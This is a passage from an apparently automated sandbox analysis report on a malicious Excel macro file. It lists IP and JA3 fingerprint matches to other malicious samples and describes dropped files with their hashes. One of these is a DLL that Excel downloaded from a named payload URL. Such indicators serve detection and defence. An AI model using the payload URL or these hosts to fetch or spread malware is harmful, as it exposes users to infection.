                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                GD-EMEA-DC-SXB1DEHkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                                • 80.86.91.27
                                                                                                                                ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                                • 80.86.91.27
                                                                                                                                sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                • 80.86.91.27
                                                                                                                                INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                • 80.86.91.27
                                                                                                                                hiytvys.dllGet hashmaliciousBrowse
                                                                                                                                • 80.86.91.27
                                                                                                                                l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                                • 80.86.91.27
                                                                                                                                ymuyks.dllGet hashmaliciousBrowse
                                                                                                                                • 80.86.91.27
                                                                                                                                INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                • 80.86.91.27
                                                                                                                                hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                                • 80.86.91.27
                                                                                                                                INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                • 80.86.91.27
                                                                                                                                jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                                • 80.86.91.27
                                                                                                                                s3CRQNulKZ.exeGet hashmaliciousBrowse
                                                                                                                                • 217.172.179.54
                                                                                                                                DFR2154747.vbeGet hashmaliciousBrowse
                                                                                                                                • 85.25.93.233
                                                                                                                                r8a97.exeGet hashmaliciousBrowse
                                                                                                                                • 62.75.168.106
                                                                                                                                NKsplucdAu.exeGet hashmaliciousBrowse
                                                                                                                                • 217.172.179.54
                                                                                                                                lZVNh1BPxm.exeGet hashmaliciousBrowse
                                                                                                                                • 217.172.179.54
                                                                                                                                qG5E4q8Cv5.exeGet hashmaliciousBrowse
                                                                                                                                • 217.172.179.54
                                                                                                                                SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exeGet hashmaliciousBrowse
                                                                                                                                • 217.172.179.54
                                                                                                                                990109.exeGet hashmaliciousBrowse
                                                                                                                                • 87.230.93.218
                                                                                                                                og0gax.dllGet hashmaliciousBrowse
                                                                                                                                • 62.138.14.216
                                                                                                                                OVHFRHkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                                • 46.105.131.65
                                                                                                                                Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                                                                                                                • 149.202.23.211
                                                                                                                                ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                                • 46.105.131.65
                                                                                                                                sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                • 46.105.131.65
                                                                                                                                INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                • 46.105.131.65
                                                                                                                                sfk_setup.exeGet hashmaliciousBrowse
                                                                                                                                • 54.39.133.136
                                                                                                                                hiytvys.dllGet hashmaliciousBrowse
                                                                                                                                • 46.105.131.65
                                                                                                                                l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                                • 46.105.131.65
                                                                                                                                ymuyks.dllGet hashmaliciousBrowse
                                                                                                                                • 46.105.131.65
                                                                                                                                Client.vbsGet hashmaliciousBrowse
                                                                                                                                • 92.222.182.237
                                                                                                                                INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                • 46.105.131.65
                                                                                                                                hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                                • 46.105.131.65
                                                                                                                                INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                • 46.105.131.65
                                                                                                                                jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                                • 46.105.131.65
                                                                                                                                Pioneercon Project Contract.exeGet hashmaliciousBrowse
                                                                                                                                • 51.195.53.221
                                                                                                                                Outstanding Payments.exeGet hashmaliciousBrowse
                                                                                                                                • 51.195.53.221
                                                                                                                                Quw3X5oAwe.exeGet hashmaliciousBrowse
                                                                                                                                • 51.83.208.157
                                                                                                                                H56P7iDwnJ.docGet hashmaliciousBrowse
                                                                                                                                • 142.44.230.78
                                                                                                                                11998704458248.exeGet hashmaliciousBrowse
                                                                                                                                • 54.37.160.157
                                                                                                                                Test.HTMGet hashmaliciousBrowse
                                                                                                                                • 145.239.131.60
                                                                                                                                SENTIANLHkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                hiytvys.dllGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                ymuyks.dllGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.233
                                                                                                                                anthon.exeGet hashmaliciousBrowse
                                                                                                                                • 145.131.21.142
                                                                                                                                baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                                                • 91.216.141.46
                                                                                                                                p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                                                                                • 91.216.141.46
                                                                                                                                IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                                                                                • 91.216.141.46
                                                                                                                                148wWoi8vI.exeGet hashmaliciousBrowse
                                                                                                                                • 91.216.141.46
                                                                                                                                plusnew.exeGet hashmaliciousBrowse
                                                                                                                                • 145.131.29.142
                                                                                                                                List-20200731-79226.docGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.16
                                                                                                                                LIST-20200731-88494.docGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.16
                                                                                                                                Rep_20200731.docGet hashmaliciousBrowse
                                                                                                                                • 5.100.228.16

                                                                                                                                JA3 Fingerprints

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                eb88d0b3e1961a0562f006e5ce2a0b87INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                Document74269.xlsGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                Document74269.xlsGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                1 Total New Invoices-Monday December 14 2020.xlsGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                1-Total New Invoices Monday Dec 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                SecuriteInfo.com.Heur.15645.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                Statement_1857_of_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                Statement_9505_of_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                MSC printouts of outstanding as of 73221_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                Invoice.29002611.docGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                MSC printouts of outstanding as of 64338_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                MSC printouts of outstanding as of 41705_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37
                                                                                                                                printouts of outstanding as of 27212_12_11_2020.xlsmGet hashmaliciousBrowse
                                                                                                                                • 77.220.64.37

                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                                                                Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):914
                                                                                                                                Entropy (8bit):7.367371959019618
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
                                                                                                                                MD5:E4A68AC854AC5242460AFD72481B2A44
                                                                                                                                SHA1:DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
                                                                                                                                SHA-256:CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
                                                                                                                                SHA-512:5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: 0...0..v........:......(d.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0...*.H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90...*.H.............`g(.o.Hc.1..g..}<.J...+.._sw*2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G*=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq..*.O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.
                                                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):58936
                                                                                                                                Entropy (8bit):7.994797855729196
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                                                Malicious:false
                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                                                                Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):252
                                                                                                                                Entropy (8bit):3.062651630993698
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:kKKLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:CLutWOxSW0zeYrsMlU/
                                                                                                                                MD5:EC88C03D6E1EB7B23DCB08444B01283D
                                                                                                                                SHA1:71F62BEAD0E3E6B8EAFAD73D3602E036389EB285
                                                                                                                                SHA-256:A1777183381435728481E8341BE54FDFF04A4BDA6BB64E569FC379167E4AC8D4
                                                                                                                                SHA-512:35D83A583E9956BA23F29900C51CB6F88D6D5743B98C43DAFC85428C458EF7F33D675DAB86FA122688942FC1D6A2F93BD358F51B48DA50CAF1EF03FF1D8CFA07
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview: p...... ....j......&....(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...
                                                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):326
                                                                                                                                Entropy (8bit):3.1231869637929037
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:kKinwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:pkPlE99SNxAhUegeT2
                                                                                                                                MD5:F24E45B5BC58337728355A1FA04DFBB1
                                                                                                                                SHA1:1F1914527C128D6A3F66B347FF80ACFC9F3F34A0
                                                                                                                                SHA-256:6CF7266DF387019A41C0CAF8C6CAA49A5434577C57134A704801477E8172DD62
                                                                                                                                SHA-512:F963ADA7D5F449655710F11E89A4B599AD7BFAD5FC2F6400A4DE7B95E8C4C1D1BA47D691D5CC1E96D007863E4396D506FA5DD2CD0489495241112974142625CF
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview: p...... ...............(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zip
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:downloaded
                                                                                                                                Size (bytes):318976
                                                                                                                                Entropy (8bit):7.120104121741336
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:5HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:RdO02Srnh0qEJC+Y218jdU
                                                                                                                                MD5:F317BDF94E5306AC0B02EDE9A263E36C
                                                                                                                                SHA1:073D7B5C5896A2974C454A9BC21B097C19E8AFB3
                                                                                                                                SHA-256:D5CF6F2148848F36D4A55BBC791372189EDFFB6326D8A0BB9B8743FD25BF0C8F
                                                                                                                                SHA-512:A26EDB19B9D7FDA69DB767B20A08DD769F760115CC668494B18ACED009FE1B9D4DF0D5A2D0B94F1B13D808E461A4B7C19527EA3D6C61C9B5D17DF5263E78193F
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                Reputation:low
                                                                                                                                IE Cache URL:http://wexfashion.com/k04qkvqu.zip
                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.z...`.......&.......@...............................@..........................................................|....................0..P....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.F....p.......2..............@..@.data...`............4..............@....text4...R.......T...P.............. ..@.rsrc...|........0..................@..@.reloc..P....0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F562CE8.png
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:PNG image data, 363 x 234, 8-bit colormap, non-interlaced
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2653
                                                                                                                                Entropy (8bit):7.818766151665501
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
                                                                                                                                MD5:30D3FFA1E30B519FD9B1B839CC65C7BE
                                                                                                                                SHA1:1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
                                                                                                                                SHA-256:89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
                                                                                                                                SHA-512:88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview: .PNG........IHDR...k.........S.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.........KIK..................IDATx...b.0.E-......`.Y..~f.$.h...,..H..CLg.x<.h..k..k..k..k..k..k..k........:....$F...........E.....t.c?.~...q?.....!F....)<#$.l.......`..f.......;.......D]M.~..s.....h.}`.&{..X2.6.....s.;3>..o....0zn...])..8..;..rA..6..Xn"R..a.Bw..M....tw..mE.w....>....].._v...z...H.y..8{)Z...gu.C~.3...>]o..>_.F/....._7nt...c...n..lu..g..@......I...=.........?.9...."..Rc..b..lf.f..l.....#4...Fw.A{...&N.Z.'..2.;.?.h.|..eZf..`..`..`..`......O..m.>n.-fS.........R...q.....F..D.....w...e..x.H.?.C........;.o!.)....@G..y..EY...5.>...'.}..4(..Aj)d.Pk....7vG........,G..RZ.#F...K.<.....'j...^r.(......"......FHN.D4.j.y..wJ_...H2.....lN....?.V?...z.K.......M..F... ..t...053..:..0.~.S-.30..'...Q..et..=...5.q.Ko..Y#...H.~...C..CLi.83..6_..B.DC..>?.]..fGo..X0}C.|.@B..AJ.s.x...n..[.#WE....F.gv..i}..f}.....qG...G.O4....w6.x.L.J.......^._o:Za}..{.x.....F
                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\88DFF5C3.emf
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1408
                                                                                                                                Entropy (8bit):2.270567557934206
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
                                                                                                                                MD5:40550DC2F9D56285FA529159B8F2C6A5
                                                                                                                                SHA1:DD81D41D283D2881BEC77E00D773C7E8C0744DA3
                                                                                                                                SHA-256:DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
                                                                                                                                SHA-512:FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
                                                                                                                                Malicious:false
                                                                                                                                Preview: ....l................................... EMF........).......................`...1........................|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................
                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_0b90bebe\Report.wer
                                                                                                                                Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):15904
                                                                                                                                Entropy (8bit):3.720171397288092
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:LiBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOB1rO:NBKzFCEuhTlyZVa6LVaJa5GG
                                                                                                                                MD5:C0FDF878DDBA23452C0522DD98898423
                                                                                                                                SHA1:DEE79D22CB59614E14338A70745A6F5FDFC3C0AB
                                                                                                                                SHA-256:8BDF926423D889E70675B75B632C0614401BCF7BBF21D9345EC76605DF4C2ED0
                                                                                                                                SHA-512:23A08824D947FBFB129398299FAE440FE560C66DB5BD299DD95BF3027728817E4F6D4E1982360957BB5578887E943B9BE95BDA37EBEF5C6872E92F84FB81DD3D
                                                                                                                                Malicious:false
                                                                                                                                Preview: V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.9.0.0.4.8.2.0.7.4.6.9.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.4.9.0.0.4.9.9.0.7.8.7.2.7.7.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.3.e.6.e.a.1.-.5.4.9.1.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.3.e.6.e.a.0.-.5.4.9.1.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.3.7.0.1.1.5.9.2.6.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.3.8.0.7.0.7.5.2.5.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...7.0.1.5...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.5.1.c.c.a.7.c.d.....S.i.g.[.3.]...N.a.m.
                                                                                                                                C:\Users\user\AppData\Local\Temp\93EE0000
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):58702
                                                                                                                                Entropy (8bit):7.858362652853985
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:hq8RzggbLmCf6646CIKtzjM5jeEXxFVnsLNFqtM:hD1rmCM28jXEX/Vn+MM
                                                                                                                                MD5:8AC68DDB24B06F63E7DE6A63F7C0ADA4
                                                                                                                                SHA1:A5548CED2ECF287CCACB01BB58359DA34D93BB50
                                                                                                                                SHA-256:2755A1EF910C69828EEC69EE0D918DB19B8A9B359EA8D8B536700C09CFDDB917
                                                                                                                                SHA-512:2E4B345D5771C42BB3B26377A2B83EB36625F2C5B4547AC8827A23EFD05BFFD35E122788CC8F9C1736B803B99A2AB82189B0A4EB795E9FB9BD857A294AFF78E6
                                                                                                                                Malicious:false
                                                                                                                                Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                C:\Users\user\AppData\Local\Temp\993414.cvr
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1392
                                                                                                                                Entropy (8bit):3.2493177971203697
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:zll/jUzQq3083f3V/Vl/8Ck6H0g6z4/HNwMNK1PjMZd4RXTdG/ntEFAlYJFBB:zll/YZ308v3mCk/8/H/KoP4hMt4PB
                                                                                                                                MD5:82E6FCED0AF2D4CB647F0BC81154E36A
                                                                                                                                SHA1:3E70CFBF4A0E9B101A5F9829EF31EB4EDF4B8DBF
                                                                                                                                SHA-256:109B7A17C0768291069E87C8803DF4D43E30E8DEB25F22EAA9303999AE8D558B
                                                                                                                                SHA-512:9C1AA7D7DDF9D4308061DB49C4DE0542F83FB4EA148ECD6FAC21135CA7978AEA9E0DA1BBA3C8E695816C2B3BA1460919A4F1677059BF910EE3748600F9BD2469
                                                                                                                                Malicious:false
                                                                                                                                Preview: MSQMx.........Q................g.........................W..........................................................................................`......EXCE........................................5...g.......;...........<...........A...........l...........................z...........................................................................................................................H.......................................b...........N...................YE..C...........F...........Q...........W.......j%...........%..............................................................+...........0...........:...........;...................r...........................................................(...........(.... ......i...:!..........n"...........".......%...".......%...".......%...".......%...".......%...".......%..7#..........?...t...(.......t...(...............................<...B............$../....................D../.......................$...$............$..n370.....D..
                                                                                                                                C:\Users\user\AppData\Local\Temp\Cab8641.tmp
                                                                                                                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):58936
                                                                                                                                Entropy (8bit):7.994797855729196
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                                                Malicious:false
